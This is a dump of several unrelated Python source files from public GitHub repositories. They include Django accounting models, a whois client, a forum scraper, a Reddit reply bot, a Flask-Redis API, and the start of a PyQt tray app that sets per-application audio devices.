blank=True, related_name='account')\n additional_inventory_food = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True, verbose_name='Add. inv. food')\n terra_luxury_sum = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True)\n luxury_consumed = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True)\n luxury_paid_diff = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True, verbose_name='Lux paid diff')\n terra_brutto_all_sum = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True, help_text=\"Sum of all brutto terra invoice totals\", verbose_name='Tot. Terra brutto (all)')\n terra_food_others_sum = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True, verbose_name='Tot. food (others)')\n terra_food_others_fee_sum = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True, verbose_name='Tot. food (others) + fee')\n terra_brutto_others_sum = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True, help_text=\"Sum of all terra invoices without deposit and not from pumpwerk\")\n terra_deposit_sum = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True, verbose_name='Deposit sum')\n terra_food_pumpwerk_sum = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True)\n terra_food_pumpwerk_fee = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True, verbose_name='Fee food (PW)')\n food_expenses_pumpwerk_sum = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True, verbose_name='Tot. food (PW)')\n attendance_day_sum = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True, verbose_name='Tot. days')\n previous_terra_daily_rate = models.DecimalField(max_digits=8, decimal_places=2, verbose_name='Prev. Terra rate')\n corrected_terra_daily_rate = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True, verbose_name='New Terra rate (+Fee)')\n \n comment = models.TextField(blank=True, null=True)\n\n class Meta:\n verbose_name = 'Account'\n verbose_name_plural = 'Accounts'\n ordering = ['-inventory__inventory_date']\n\n def __str__(self):\n return \"Account: {}\".format(self.title)\n\n def calculate(self):\n # get relevant objects\n previous_inventory = self.inventory.get_previous_inventory()\n user_bills = UserBill.objects.filter(bill__in=self.inventory.bills.all())\n terra_invoices = TerraInvoice.objects.filter(terra_invoice_date__gt=previous_inventory.inventory_date, terra_invoice_date__lte=self.inventory.inventory_date)\n\n # make all the calculations\n self.attendance_day_sum = user_bills.aggregate(attendance_days_sum=Sum(F('attendance_days') * F('user__calculation_factor')))['attendance_days_sum']\n self.additional_inventory_food = (self.inventory.sum_inventory - self.inventory.sum_luxury) - (previous_inventory.sum_inventory - previous_inventory.sum_luxury)\n \n user_bill_luxury_sum = user_bills.aggregate(luxury_sum=Sum('luxury_sum'))['luxury_sum']\n terra_sums = terra_invoices.aggregate(invoice_sum=Sum('invoice_sum'), deposit_sum=Sum('deposit_sum'), luxury_sum=Sum('luxury_sum'), other_sum=Sum('other_sum'))\n self.terra_luxury_sum = terra_sums['luxury_sum']\n self.luxury_consumed = self.terra_luxury_sum - (self.inventory.sum_luxury - previous_inventory.sum_luxury)\n self.luxury_paid_diff = user_bill_luxury_sum + self.inventory.sum_cash - self.luxury_consumed \n self.terra_brutto_all_sum = terra_sums['invoice_sum']\n self.terra_deposit_sum = terra_sums['deposit_sum']\n\n terra_brutto_others_sum = terra_invoices.filter(is_pumpwerk=False).aggregate(invoice_total=Sum(F('invoice_sum') - F('deposit_sum')))['invoice_total']\n terra_brutto_others_fee_sum = terra_invoices.filter(is_pumpwerk=False).aggregate(invoice_total=Sum((F('invoice_sum') - F('deposit_sum')) * (1.0 + F('fee') / 100.0), output_field=models.DecimalField()))['invoice_total']\n # other_invoice_deposit_sum = terra_invoices.filter(is_pumpwerk=False).aggregate(deposit_sum=Sum('deposit_sum'))['deposit_sum']\n self.terra_food_others_fee_sum = terra_brutto_others_fee_sum\n self.terra_food_others_sum = terra_brutto_others_sum\n self.terra_brutto_others_sum = terra_brutto_others_sum\n terra_food_pumpwerk_sum = terra_invoices.filter(is_pumpwerk=True).aggregate(invoice_total=Sum(F('invoice_sum') - F('deposit_sum') - F('luxury_sum')))['invoice_total']\n terra_food_pumpwerk_fee = terra_invoices.filter(is_pumpwerk=True).aggregate(invoice_total=Sum((F('invoice_sum') - F('deposit_sum') - F('luxury_sum')) * ( F('fee') / 100.0), output_field=models.DecimalField()))['invoice_total']\n self.terra_food_pumpwerk_sum = terra_food_pumpwerk_sum\n self.terra_food_pumpwerk_fee = terra_food_pumpwerk_fee\n self.food_expenses_pumpwerk_sum = self.terra_food_pumpwerk_sum - self.additional_inventory_food\n self.corrected_terra_daily_rate = (self.food_expenses_pumpwerk_sum + self.terra_food_pumpwerk_fee) / self.attendance_day_sum\n\n self.save()\n\n # delete existing UserPaybacks for acccount\n UserPayback.objects.filter(account=self).delete()\n # create all the UserPayback objects\n user_attendance_days = user_bills.values('user').order_by('user').annotate(sum_attendance_days=Sum('attendance_days'))\n for user_attendance_day in user_attendance_days:\n user = User.objects.get(pk=user_attendance_day['user'])\n user_payback, created = UserPayback.objects.get_or_create(\n user=user,\n account=self,\n total_days=user_attendance_day['sum_attendance_days'],\n total=user_attendance_day['sum_attendance_days'] * user.calculation_factor * (self.previous_terra_daily_rate - self.corrected_terra_daily_rate),\n )\n\n\nclass UserPayback(models.Model):\n user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.PROTECT)\n account = models.ForeignKey('Account', on_delete=models.PROTECT)\n total_days = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True)\n total = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True)\n has_paid = models.BooleanField(default=False, verbose_name='Paid?')\n comment = models.TextField(blank=True, null=True)\n\n class Meta:\n unique_together = ['user', 'account']\n verbose_name = 'User payback'\n verbose_name_plural = 'User paybacks'\n ordering = ['-account', 'user']\n\n def __str__(self):\n return \"User payback: {}\".format(self.account.title)\n","repo_name":"bruecksen/pumpwerk","sub_path":"pumpwerk/food/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":19058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31082528946","text":"import requests\nimport socket\n\nfrom typing import List\n\n\nclass Whois:\n @staticmethod\n def whois_tcp_query(query: str, server: str, strip_comments: bool = False) -> List[str]:\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client_socket.settimeout(10)\n client_socket.connect((server, 43))\n client_socket.send(bytes(query, 'utf-8') + b'\\r\\n')\n response = b''\n while True:\n received_data = client_socket.recv(4096)\n response += received_data\n if not received_data:\n break\n client_socket.close()\n response_str = response.decode('utf-8', 'replace')\n response_lines = [line for line in response_str.splitlines() if line]\n if strip_comments:\n return [response_line for response_line in response_lines if not response_line.startswith('%')]\n else:\n return response_lines\n\n @staticmethod\n def whois_http_query(query: str, server: str, strip_comments: bool = False) -> List[str]:\n url = server + query\n response = requests.request(\n method='GET',\n url=url,\n verify=False,\n )\n if response.status_code == 200:\n response_lines = response.content.splitlines()\n if strip_comments:\n return [response_line for response_line in response_lines if not response_line.startswith('%')]\n else:\n return response_lines\n else:\n return []\n\n def get_whois_server(self, tld_name: str) -> str:\n tld_name = tld_name.lower()\n response_lines = self.whois_tcp_query(tld_name, 'whois.iana.org')\n whois_server = None\n for line in response_lines:\n if line.startswith('whois:'):\n whois_server = line.replace('whois:', '').strip()\n\n return whois_server\n\n def domain_query(self, domain_name: str) -> List[str]:\n domain_parts = domain_name.split('.')\n whois_server = self.get_whois_server(domain_parts[1])\n return Whois.whois_tcp_query(\n query=domain_name, server=whois_server\n )\n\n @staticmethod\n def domain_available(domain_name: str, whois_server: str, available_search_str: str) -> bool:\n whois_server_parts = whois_server.split('://')\n protocol = whois_server_parts[0].lower()\n\n response_lines = []\n if protocol == 'socket':\n response_lines = Whois.whois_tcp_query(\n query=domain_name, server=whois_server_parts[1]\n )\n\n if protocol in ['http', 'https']:\n response_lines = Whois.whois_http_query(\n query=domain_name, server=whois_server\n )\n\n if not available_search_str:\n return len(response_lines) == 0\n else:\n for response_line in response_lines:\n if available_search_str in response_line:\n return True\n\n return False\n","repo_name":"pizzhub/backendfleio-test","sub_path":"project/plugins/domains/whois.py","file_name":"whois.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5238294816","text":"# LOGGING IS A GREAT WAY TO SEE WHAT'S HAPPENING IN YOUR CODE\n\nimport logging\nlogging.basicConfig(level = logging.DEBUG, format='%(asctime)s - %(levelname)s - %(message)s')\n\n# to have a file with the messages from the log\n# logging.basicConfig(filename='myProgramLog.txt',level = logging.DEBUG, format='%(asctime)s - %(levelname)s - %(message)s')\n\n\n# To disable the messages\nlogging.disable(logging.CRITICAL)\n\n# To create and see messages and control your CODE\nlogging.debug('Start of program')\n\n# Example with factorial\ndef factorial(n):\n logging.debug(f'Start of factorial {n}')\n\n total = 1\n for i in range(1, n + 1):\n total *= i\n logging.debug(f'i is {i}, total is {total}')\n\n logging.debug(f'return value is {total}')\n return total\n\nprint(factorial(5))\n\nlogging.debug('End of program')\n","repo_name":"bruno-gs/Python","sub_path":"Automate the boring stuff/Debugging/LOGGING/class.py","file_name":"class.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5377817046","text":"class AddBinary:\n def addBinary4(self, a, b):\n \"\"\"\n :type a: str\n :type b: str\n :rtype: str\n \"\"\"\n return bin(int(a, 2) + int(b, 2))[2:]\n\n def addBinary(self, a: str, b: str) -> str:\n result = ''\n idx_a, idx_b = len(a) - 1, len(b) - 1\n carry = 0\n while idx_a >= 0 or idx_b >= 0:\n v_a = 1 if idx_a >= 0 and a[idx_a] == '1' else 0\n v_b = 1 if idx_b >= 0 and b[idx_b] == '1' else 0\n carry, rem = divmod(carry + v_a + v_b, 2)\n result = str(rem) + result\n idx_a -= 1\n idx_b -= 1\n if carry == 1:\n result = '1' + result\n return result\n\n def addBinary3(self, a: 'str', b: 'str') -> 'str':\n Len=max(len(a),len(b))\n a=a.zfill(Len)\n b=b.zfill(Len)\n add=0\n s=\"\"\n for i in range(Len-1, -1, -1):\n temp=int(a[i])+int(b[i])+add\n if temp>=2:\n s=str(temp-2)+s\n add=1\n else:\n s=str(temp)+s\n add=0\n if add==1:\n return \"1\"+s\n return s\n\n def addBinary2(self, a: 'str', b: 'str') -> 'str':\n table = {\n (False, False, False): (False, '0'), # carry and value\n (False, False, True): (False, '1'),\n (False, True, False): (False, '1'),\n (False, True, True): (True, '0'),\n (True, False, False): (False, '1'),\n (True, False, True): (True, '0'),\n (True, True, False): (True, '0'),\n (True, True, True): (True, '1'),\n (False, False): (False, '0'),\n (False, True): (False, '1'),\n (True, False): (False, '1'),\n (True, True): (True, '0')\n }\n idx_a, idx_b = len(a)-1, len(b)-1\n carry, result = False, ''\n while idx_a >= 0 and idx_b >= 0:\n carry, c = table[(carry, a[idx_a]=='1', b[idx_b]=='1')]\n result = c + result\n idx_a -= 1\n idx_b -= 1\n (idx, s) = (idx_a, a) if idx_a >= 0 else (idx_b, b)\n while carry and idx >=0:\n carry, c = table[(carry, s[idx]=='1')]\n result = result + c\n idx -= 1\n if carry: result = '1' + result\n return result\n","repo_name":"yokolet/tranquil-beach-python","sub_path":"tranquil-beach/arrays_strings/add_binary.py","file_name":"add_binary.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23564648797","text":"import requests\nimport re\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport math\nimport csv\n\ncevaplar= []\ntarihler = []\n\ndef sayfasayisibulucu(a):\n a = a.replace(\"Cevap\",\"\")\n a = a.replace(\".\",\"\")\n sayfa_sayisi = math.ceil(float(a)/20) \n return sayfa_sayisi+1\n\nf = open(\"linkler.txt\", \"r\", encoding='utf-8-sig')\nicerik = list(f)\nfor ic in icerik:\n try:\n linkler = 'https://forum.donanimhaber.com' + ic.strip()\n URL = linkler\n page = requests.get(URL)\n soup = BeautifulSoup(page.content,features='html.parser')\n tumicerik = soup.find(class_ = 'dhfull')\n cevap_sayisi = soup.find(class_ = 'sayisal-text').text\n sayfa_sayisi = sayfasayisibulucu(cevap_sayisi)\n print(sayfa_sayisi)\n icerikler = tumicerik.find_all('div', class_ ='kl-icerik-satir')\n \n for i in range(1,sayfa_sayisi, 1):\n \n i = str(i)\n print(i + '. sayfadayım')\n URL = linkler + '-'+ i +''\n print(URL)\n page = requests.get(URL)\n soup = BeautifulSoup(page.content,features='html.parser')\n tumicerik = soup.find(class_ = 'dhfull')\n icerikler = tumicerik.find_all('div', class_ ='kl-icerik-satir')\n \n try:\n for icerik in icerikler:\n mesaj = icerik.find('span', class_ ='msg')\n m = mesaj.find('td')\n cevaplar.append(m.text.strip())\n tarih = icerik.find('span', class_ ='ki-cevaptarihi')\n t = tarih.find('a')\n tarihler.append(t.text.strip())\n except:\n print(\"Sayfada Sorun çıktı!\")\n continue\n except:\n print(\"Komple Başlıkta Sorun Çıktı\")\n continue\n\n\ndf = pd.DataFrame({'Cevaplar':cevaplar, 'Tarihler': tarihler})\ndf.to_csv('corpus.csv', index = False, encoding='utf-8-sig', sep = 'æ')\n\n","repo_name":"oguzhari/DonanimHaberForumScrapper","sub_path":"forum_icerigi.py","file_name":"forum_icerigi.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26949440829","text":"import praw\nimport re\nfrom bot import Bot\n\n###########################################################################################################\n\"\"\"\nThis file was written and distributed by Vishay Singh, with huge thanks to the fantastic work done \nhere: http://pythonforengineers.com/build-a-reddit-bot-part-1/\n\nPlease consider visiting the website for further information about the project. \n\nThe bot here runs on the subreddit r/pythonforengineers. Please note that running this bot on any other\nsubreddit can result in your account being banned for breaking the rules (notably spam). However, if you\nwant to run the bot on any other subreddit, change line 29 with the desired subreddit.\n\"\"\"\n###########################################################################################################\n\n\n#a dictionary of mood-quote pairings\nbot_quotes = \\\n{\n\"calm\" : [\" That's what I thought. \", \" Ok cool.\", \" nice ;)\"],\n\"mad\" : [\" No u \", \" Blimey mate, don't have feelings of anger towards me because I'm a more dazzing fellow.\"],\n\"ironic\" : [\" The reddit hivemind continues... \", \" Have you ever heard the tragedy of Darth Plagueis the Wise?\"],\n}\n\n#setup reddit\nreddit = praw.Reddit('bot1')\nsubreddit = reddit.subreddit(\"pythonforengineers\")\n\n#instantiate Bot\nmy_bot = Bot(\"Sir Bottington The Third\", bot_quotes)\nfound_comment = False\n\n#loop through the top five posts in the subreddit's hot section\nfor submission in subreddit.hot(limit=5):\n if not submission.archived:\n for comment in submission.comments:\n print(comment.body)\n if re.search(\".*(IMO)+.*\", comment.body, re.IGNORECASE):\n my_bot.change_mood(\"calm\")\n found_comment = True\n elif re.search(\".*((left)+(right)*)|((left)*(right)+)+.*\", comment.body, re.IGNORECASE):\n my_bot.change_mood(\"ironic\")\n found_comment = True\n elif re.search(\".*((you)+((stupid)*(idiot)*(suck)*)+)+.*\", comment.body, re.IGNORECASE):\n my_bot.change_mood(\"mad\")\n found_comment = True\n\n bot_reply = my_bot.get_reply()\n if found_comment:\n comment.reply(bot_reply)\n found_comment = False\n print(bot_reply)\n else:\n print(\"No valid comment found\") \n \n\n\n","repo_name":"V35games/Python-Bots","sub_path":"My-bot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9652509496","text":"#!/usr/bin/python3\n\nimport sys\nfrom os import listdir\nfrom os.path import isfile, join\n\nPATH = \"/home/baptiste/Bureau/formatTest/\"\nexpName = sys.argv[1]\n\nFOLDERS = [f for f in listdir(PATH) if isfile(join(PATH, f)) != True and expName in f]\nFOLDERS.sort()\n\n\nGstTot = \"\"\nHtTot = \"\"\nHsTot = \"\"\nHobsTot = \"\"\nFisTot = \"\"\nExtTot = \"\"\nfor folder in FOLDERS:\n FILES = [fi for fi in listdir(join(PATH, folder)) if isfile(PATH + folder + \"/\" + fi) and \".res\" in fi]\n for fichier in FILES:\n if \"Gst\" in fichier:\n fileFlux = open(PATH + folder + \"/\" + fichier, \"r\")\n GstTot += fileFlux.read()\n fileFlux.close()\n if \"Ht\" in fichier:\n fileFlux = open(PATH + folder + \"/\" + fichier, \"r\")\n HtTot += fileFlux.read()\n fileFlux.close()\n if \"Hs\" in fichier:\n fileFlux = open(PATH + folder + \"/\" + fichier, \"r\")\n HsTot += fileFlux.read()\n fileFlux.close()\n if \"Hobs\" in fichier:\n fileFlux = open(PATH + folder + \"/\" + fichier, \"r\")\n HobsTot += fileFlux.read()\n fileFlux.close()\n if \"Fis\" in fichier:\n fileFlux = open(PATH + folder + \"/\" + fichier, \"r\")\n FisTot += fileFlux.read()\n fileFlux.close()\n if \"Ext\" in fichier:\n fileFlux = open(PATH + folder + \"/\" + fichier, \"r\")\n ExtTot += fileFlux.read()\n fileFlux.close()\n\n\nif \"NSel\" in fichier:\n fileWriteGst = open(PATH+\"GstTotNSel.csv\", \"w\")\n fileWriteGst.write(GstTot)\n fileWriteGst.close()\n fileWriteHt = open(PATH+\"HtTotNSel.csv\", \"w\")\n fileWriteHt.write(HtTot)\n fileWriteHt.close()\n fileWriteHs = open(PATH+\"HsTotNSel.csv\", \"w\")\n fileWriteHs.write(HsTot)\n fileWriteHs.close()\n fileWriteHobs = open(PATH+\"HobsTotNSel.csv\", \"w\")\n fileWriteHobs.write(HobsTot)\n fileWriteHobs.close()\n fileWriteFis = open(PATH+\"FisTotNSel.csv\", \"w\")\n fileWriteFis.write(FisTot)\n fileWriteFis.close()\n fileWriteExt = open(PATH+\"ExtTotNSel.csv\", \"w\")\n fileWriteExt.write(ExtTot)\n fileWriteExt.close()\nelse:\n fileWriteGst = open(PATH+\"GstTotSel.csv\", \"w\")\n fileWriteGst.write(GstTot)\n fileWriteGst.close()\n fileWriteHt = open(PATH+\"HtTotSel.csv\", \"w\")\n fileWriteHt.write(HtTot)\n fileWriteHt.close()\n fileWriteHs = open(PATH+\"HsTotSel.csv\", \"w\")\n fileWriteHs.write(HsTot)\n fileWriteHs.close()\n fileWriteHobs = open(PATH+\"HobsTotSel.csv\", \"w\")\n fileWriteHobs.write(HobsTot)\n fileWriteHobs.close()\n fileWriteFis = open(PATH+\"FisTotSel.csv\", \"w\")\n fileWriteFis.write(FisTot)\n fileWriteFis.close()\n fileWriteExt = open(PATH+\"ExtTotSel.csv\", \"w\")\n fileWriteExt.write(ExtTot)\n fileWriteExt.close()\n","repo_name":"rougerbaptiste/CropOutAnalysis","sub_path":"formatData.py","file_name":"formatData.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9273469661","text":"#https://stackoverflow.com/questions/43557929/conversion-of-string-to-upper-case-without-inbuilt-methods\ndef mayus_conv(palabra):\n for letter in palabra:\n s = ord(letter)\n if 97 <= s <= 122:\n print(chr(s - 32), end=\"\")\n\n\ndef main():\n palabra=input(\"Introducir una palabra en minúsculas: \")\n mayus_conv(palabra)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"badorius/curso-python","sub_path":"Ejercicios/modulo_funciones/mayus.py","file_name":"mayus.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74305917609","text":"import redis\nfrom flask import Flask, request, abort\n\n\napp = Flask(__name__)\nr = redis.Redis(host='0.0.0.0', port=6379)\n\n\n@app.route('/', methods=['GET'])\ndef get(key):\n value = r.get(key)\n if value == None:\n abort(404)\n return value\n\n\n@app.route('/', methods=['POST'])\ndef post():\n dct = request.get_json()\n key = list(dct.keys())[0]\n value = dct.get(key)\n r.set(key, value)\n return 'OK'\n \n\n@app.route('/', methods=['PUT'])\ndef put(key):\n if r.get(key) == None:\n abort(404)\n value = request.get_json().get(key)\n r.set(key, value)\n return 'OK'\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=8080)\n\n","repo_name":"mekhnin/awesome","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16545669418","text":"import sys\nimport os\nimport subprocess\nimport time\nimport json\nimport logging\n# watch for processes\nimport wmi\nimport pythoncom\n# ui & threads\nfrom PyQt5.QtWidgets import (QApplication, QSystemTrayIcon, QMenu)\nfrom PyQt5.QtCore import QThread, QObject, pyqtSignal, QTimer, QEventLoop, QSettings, QCoreApplication, Qt\nfrom PyQt5.QtGui import QIcon\n# show notifications\nfrom plyer import notification\n\n# ------------------------------------------------------------------------------------------\n\n\ndef resource_path(relative_path):\n \"\"\" Get absolute path to resource, works for dev and for PyInstaller \"\"\"\n # PyInstaller creates a temp folder and stores the path in _MEIPASS, so if we are in a packaged build we\n # use the _MEIPASS as the relative base path, otherwise we'll use the working directory\n base_path = getattr(sys, '_MEIPASS', os.path.dirname(\n os.path.abspath(__file__)))\n\n return os.path.join(base_path, 'res', relative_path)\n\n# ------------------------------------------------------------------------------------------\n\n\ndef app_path(relative_path):\n \"\"\"Get the absolute path to the file relative to the executable\"\"\"\n if getattr(sys, 'frozen', False):\n # if we are in a bundled app, we need to use the path of the executable\n # as this is where files like the config or log should go\n base_path = os.path.dirname(sys.executable)\n else:\n # if we are just executing the script as dev we need to use the path of the file\n # as this is where files like the config or log should go\n base_path = os.path.dirname(os.path.abspath(__file__))\n\n return os.path.join(base_path, relative_path)\n\n# ------------------------------------------------------------------------------------------\n\n\n# name of the application\nAPP_NAME = 'EnforceAudioDevice'\n# files\nCONFIG_FILE_PATH = app_path('EnforceAudioDevice.json')\nLOG_FILE_PATH = app_path('EnforceAudioDevice.log')\nVALID_DEVICES_FILE_PATH = app_path('ValidDevices.json')\n# resources\nTRAY_ICON_FILE_PATH = resource_path('EnforceAudioDevice.ico')\nALERT_ICON_FILE_PATH = resource_path('EnforceAudioDeviceAlert.ico')\nCONTEXT_MENU_BG_FILE_PATH = resource_path('ContextMenu.png')\nCONTEXT_MENU_UNCHECKED_FILE_PATH = resource_path('Unchecked.png')\nCONTEXT_MENU_UNCHECKED_SELECTED_FILE_PATH = resource_path('UncheckedSelected.png')\nCONTEXT_MENU_CHECKED_FILE_PATH = resource_path('Checked.png')\nCONTEXT_MENU_CHECKED_SELECTED_FILE_PATH = resource_path('CheckedSelected.png')\nCONTEXT_MENU_ARROW = resource_path('Arrow.png')\nCONTEXT_MENU_ARROW_SELECTED = resource_path('ArrowSelected.png')\n# strings\nTRAY_TOOLTIP = 'EnforceAudioDevice'\n# registry key\nREG_RUN_PATH = \"HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\"\n\n# ------------------------------------------------------------------------------------------\n\n# setup logging\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s [%(levelname)s] %(message)s\",\n handlers=[\n logging.FileHandler(LOG_FILE_PATH, \"w\"),\n logging.StreamHandler(sys.stdout)\n ]\n)\n\n############################################################################################\n# ProcesWatcher\n############################################################################################\n\n\nclass ProcessWatcher(QThread):\n \"\"\"watches for wmi process creation or deletion events and signals when an event arrives\"\"\"\n watcher_signal = pyqtSignal(str, int)\n\n # ------------------------------------------------------------------------------------------\n\n def __init__(self, Type: str):\n QThread.__init__(self)\n self.Type = Type\n\n # ------------------------------------------------------------------------------------------\n\n def run(self):\n self.continue_run = True\n\n pythoncom.CoInitialize()\n c = wmi.WMI()\n if self.Type == \"creation\" or self.Type == \"deletion\":\n try:\n watcher = c.Win32_Process.watch_for(self.Type)\n while self.continue_run:\n event = watcher()\n self.watcher_signal.emit(event.Caption, event.ProcessID)\n except Exception as e:\n print(e)\n else:\n logging.error(\n f\"Tried to create process listener with invalid type '{self.Type}'. Valid types are: creation, deletion\")\n\n # ------------------------------------------------------------------------------------------\n\n def stop(self):\n self.continue_run = False\n # disconnect all slots from the signal as it might take a little bit until this thread actually terminates\n try:\n self.watcher_signal.disconnect()\n except Exception as e:\n logging.error(e)\n\n############################################################################################\n# ProcesWorker\n############################################################################################\n\n\nclass ProcessWorker(QThread):\n # dictionary of processes to check, will be filled from json on init\n process_dict = {}\n # the parent app containing config data\n app = None\n # timers that delay the set audio device command (delay is user defined in config)\n delayedCommandTimers = []\n\n # ------------------------------------------------------------------------------------------\n\n def __init__(self, parent=None, app=None):\n QObject.__init__(self, parent=parent)\n self.app = app\n\n # ------------------------------------------------------------------------------------------\n\n def run(self):\n self.loop = QEventLoop()\n self.loop.exec_()\n\n # ------------------------------------------------------------------------------------------\n\n def stop(self):\n # stop all running timers if the application should quit\n for t in self.delayedCommandTimers:\n t.stop()\n # stop the loop to quit this thread\n self.loop.quit()\n\n # ------------------------------------------------------------------------------------------\n\n def add_app(self, application, data):\n \"\"\"add to or update an app in the process list\"\"\"\n if not bool(data):\n logging.warning(\n f'Application \\'{application}\\' is missing parameters. Apps require a \\'Device\\' parameter defining the audio output device.')\n return\n\n app_name = application.lower()\n if not app_name.endswith('.exe'):\n app_name += '.exe'\n\n device = ''\n if 'Device' in data:\n device = data['Device']\n # check if the device is valid\n if not device in self.app.valid_devices:\n logging.warning(\n f'Application \\'{application}\\' has no or invalid \\'Device\\' configured \\'{device}\\'. Allowed devices are: {self.app.valid_devices}')\n return\n\n delay = 1\n if 'Delay' in data:\n try:\n delay = max(min(float(data['Delay']), 60.0), 0.0)\n except ValueError:\n logging.warning(f'Delay of \\'{application}\\' is not a number!')\n\n already_contains_app = app_name in self.process_dict\n\n if already_contains_app:\n if self.process_dict[app_name]['AudioDevice'] == device:\n # nothing changed, just return\n return\n\n # either the app hasn't been added yet or the device changed\n self.process_dict[app_name] = {'State': False,\n 'AudioDevice': device, 'Delay': delay}\n\n logging.info(\n ('Updated' if already_contains_app else 'Added') + ' app: ' + application)\n # check if the process is already running and handle it\n self.check_process(app_name)\n return\n\n # -------------------------------------------------------------------------------------------\n\n def check_process(self, process_name):\n pythoncom.CoInitialize()\n c = wmi.WMI()\n\n for process in c.Win32_Process(name=process_name):\n self.process_started(process_name, process.ProcessID)\n\n # ------------------------------------------------------------------------------------------\n\n def process_started(self, name: str, id: int):\n process_name = name.lower()\n if process_name in self.process_dict:\n # already running, ignore this process\n if self.process_dict[process_name]['State']:\n return\n # add the process with its process id\n else:\n logging.info(f\"Found new process running: '{process_name}'\")\n self.process_dict[process_name]['State'] = True\n self.process_dict[process_name]['ID'] = id\n delay = self.process_dict[process_name]['Delay']\n self.set_audio_device(process_name, delay)\n\n # ------------------------------------------------------------------------------------------\n\n def process_ended(self, name: str, id: int):\n process_name = name.lower()\n if process_name in self.process_dict:\n # this process is running and has the same id\n if self.process_dict[process_name]['State'] and self.process_dict[process_name]['ID'] == id:\n self.process_dict[process_name]['State'] = False\n self.process_dict[process_name]['ID'] = 0\n logging.info(f\"Process '{process_name}' has ended\")\n\n # ------------------------------------------------------------------------------------------\n\n def set_audio_device(self, application: str, delay: float):\n \"\"\"sets the audio device for the application after the defined delay\"\"\"\n if application in self.process_dict:\n audio_device = self.process_dict[application]['AudioDevice']\n command = f'{self.app.sound_volume_view_path} /SetAppDefault \"{audio_device}\" 0 \"{application}\"'\n # queue the command via timer\n self.set_command_timer(lambda: self.run_command(\n command, application, audio_device), int(delay * 1000))\n\n # ------------------------------------------------------------------------------------------\n\n def run_command(self, command, application_name, audio_device):\n #res = os.system(command)\n res = subprocess.call(command, shell=False)\n if res == 0:\n logging.info(\n f'Set audio device of application \\'{application_name}\\' to \\'{audio_device}\\'')\n else:\n logging.warning(\n f'SoundVolumeView failed to set audio device \\'{audio_device}\\' for application \\'{application_name}\\'. Error code: {res}')\n\n # ------------------------------------------------------------------------------------------\n\n def set_command_timer(self, event, delay_msec: int):\n timer = QTimer()\n self.delayedCommandTimers.append(timer)\n timer.setSingleShot(True)\n timer.timeout.connect(event)\n timer.timeout.connect(lambda: self.delayedCommandTimers.remove(timer))\n timer.start(delay_msec)\n\n # ------------------------------------------------------------------------------------------\n\n def stop_all_command_timers(self):\n for t in self.delayedCommandTimers:\n t.stop()\n self.delayedCommandTimers.clear()\n\n # ------------------------------------------------------------------------------------------\n\n def reset_process_states(self):\n # cancel all pending timers\n self.stop_all_command_timers()\n\n pythoncom.CoInitialize()\n c = wmi.WMI()\n\n # reset current state of all processes and set the device for any active ones again\n for p in self.process_dict:\n self.process_dict[p]['State'] = False\n for process in c.Win32_Process(name=p):\n self.process_started(p, process.ProcessID)\n break;\n\n############################################################################################\n# EnforceAudioDeviceApp\n############################################################################################\n\nclass EnforceAudioDeviceApp(QApplication):\n stop_signal = pyqtSignal()\n\n # a set of valid audio output devices\n valid_devices = set()\n # path to the sound volume view tool to actually run the audio device command\n sound_volume_view_path = 'SoundVolumeView.exe'\n # the thread the worker is running in\n thread: ProcessWorker = None\n\n # ------------------------------------------------------------------------------------------\n\n def __init__(self, argv) -> None:\n super().__init__(argv)\n self.create_settings()\n self.load_config_and_start_worker()\n self.trayIcon = EnforceAudioDeviceTrayIcon(self)\n\n # ------------------------------------------------------------------------------------------\n\n def create_settings(self):\n QCoreApplication.setApplicationName(APP_NAME)\n self.settings = QSettings(REG_RUN_PATH, QSettings.NativeFormat)\n\n # ------------------------------------------------------------------------------------------\n\n def load_config_and_start_worker(self):\n self.create_worker_threads()\n if self.load_config_json():\n self.start_worker_thread()\n logging.info(\n 'Successfully 